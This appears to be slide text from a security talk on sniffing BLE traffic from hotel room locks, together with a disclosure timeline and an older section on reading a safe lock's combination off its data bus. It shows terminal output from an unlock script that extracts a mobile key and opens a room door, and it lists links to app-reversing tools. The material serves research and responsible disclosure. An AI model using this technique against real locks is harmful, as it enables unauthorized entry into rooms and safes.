[Video that shows how BLE data is sniffed off the air.]

Video 2

Executing the Script

  [root@zawa mmk-unlock-master]# python mmk-unlock.py AHPKUJzL 30000000000000381a8c02fd01fef8fdf9 31605803e9196317fb5b9e8cb6e616b7bab6 32ca06cfbc48c67697f0c34897948c218c 33cf3f2a462f78d9c8874b6bb021b70034
  Derived from device name AHPKUJzL: SC == 115, Room Number == 3237
  Extracted mobile key: 8c02fd01fef8fdf9605803e9196317fb5b9e8cb6e616b7bab6ca06cfbc48c67697f0c3
  8d9c8874b6bb021b70034

  [*] scanning (3s)...
  [-] Room 3236, SC 115, Additional Data 0, 156 (00:1e:c0:5d:72:94, AHPKQJzb), RSSI=-88
  [-] Room 3237, SC 115, Additional Data 0, 156 (00:1e:c0:5d:6b:b5, AHPKUJzL), RSSI=-83
  [-] Room 3137, SC 115, Additional Data 0, 155 (00:1e:c0:5d:73:e8, AHPEEJuC), RSSI=-94
  [-] Room 3337, SC 115, Additional Data 0, 157 (00:1e:c0:4f:32:f3, AHPQkJ0Q), RSSI=-97
  unlocking in progress...
  [1] Connecting...
  Initializing BLE peripheral class...
  Setting the delegate...
  MyDelegate registered
  Discovering the BLE service...
  Discovering the write characteristic...
[Video that shows how Ray opens the hotel room door with sniffed data. (He opened doors only with permission of an authorized user, no actual breaking in happened!)]

Video 3

Some More Scripting

• Created a test target (also a Python script)
  ◦ simulates a lock
  ◦ handles BLE communication in the peripheral role (using pybleno)
• Now we could play with this at home :)

How Big Is the Problem?

• Found more hotel chains using the product
• BLE names are easy to check on-site, without an actual room booking
• After booking a room, we found an even simpler variation of the protocol deployed (the "final / special" CRC part is left out)
Responsible Disclosure

Disclosure Timeline

• 2019-04-18: First vendor notification, immediate response
• 2019-04-26: Technical details to vendor
• 2019-05-02: Vendor questions feasibility
• 2019-05-06: Proof of concept code sent
• 2019-05-29: Vendor acknowledges vulnerability
• 2019-06-28: Vendor discusses update plans

Update Plans and Challenges

• Locks in 'our' first hotel are online, can be updated remotely
• Others need someone going from door to door with an update device
• Multiple app vendors have to integrate the new SDK
• Lesson learned: Identify all affected parties early
The KABA MAS X-09™ High Security Safe Lock

[Title slide of the author's earlier talk: "Hands-On Presentation at LockCon 2008, The Netherlands, 10 Oct 2008, Michael U. Huebler".]

DEF CON 27 had a surprise...

[Reuters, Technology News, August 6, 2019, by Joseph Menn: "Exclusive: High-security locks for government and banks hacked by researcher"]

  SAN FRANCISCO (Reuters) - Hackers could crack open high-security electronic locks by monitoring their power, allowing thieves to steal cash in automated teller machines, narcotics in pharmacies and government secrets, according to research to be presented Friday at the annual Def Con hacking conference in Las Vegas.

[IOActive logo: Hardware | Software | Wetware - Security Services]

[LockCon 2008 slide, Michael U. Huebler: the electronic card of the lock]

Easy to reproduce
However, the secret combination is not transmitted in "plain text", but obfuscated

  R/W    Addr  Value
  Read   0x00  0x55
  Read   0x01  0xAA
  Read   0x8A  0x00
  Read   0x8B  0x00
  Read   0x07  0x00
  Read   0x0A  0x00
  Read   0x0E  0x00
  (long pause while the combination is dialed)
  Read   0x81  0x58
  Read   0x82  0x99
  Read   0x83  0x53
  Read   0xFD  0x58
  Read   0xFE  0x99
  Read   0xFF  0x53
  Read   0x0F  ...
  Read   0x10  0x84
  Read   0x20  0x61
  Read   0x30  0x81
  Write  0x0C  0x00
  ...

  (The original slide lists the bus trace in four side-by-side columns; the order above follows the extraction, and some cells did not survive it. The bytes 0x58 0x99 0x53 at 0x81-0x83 and 0xFD-0xFF are the serial number 589953 in BCD.)

(Serial number of the X-09: 589953 - Combination: 12 34 56)
Thanks for your attention!

Questions?

Contact: mh@tosl.org

Some Useful Links

BLE exploration tool for your smartphone:
https://apps.apple.com/app/lightblue-explorer/id557428110
https://play.google.com/store/apps/details?id=com.punchthrough.lightblueexplorer

Modifying the Android app manifest to make the app trust user CAs:
https://medium.com/@elye.project/android-nougat-charlesing-ssl-network-efa0951e66de

Rebuild / sign an APK:
https://gist.github.com/AwsafAlam/f53312cbb912cf3e4267a5971cd75db0

JADX decompiler:
https://github.com/skylot/jadx (can also simply be done online: https://www.google.com/search?&q=online+jadx)

If you are interested in locks and lock picking:
https://toool.nl/Publications
http://lockpicking.org (German)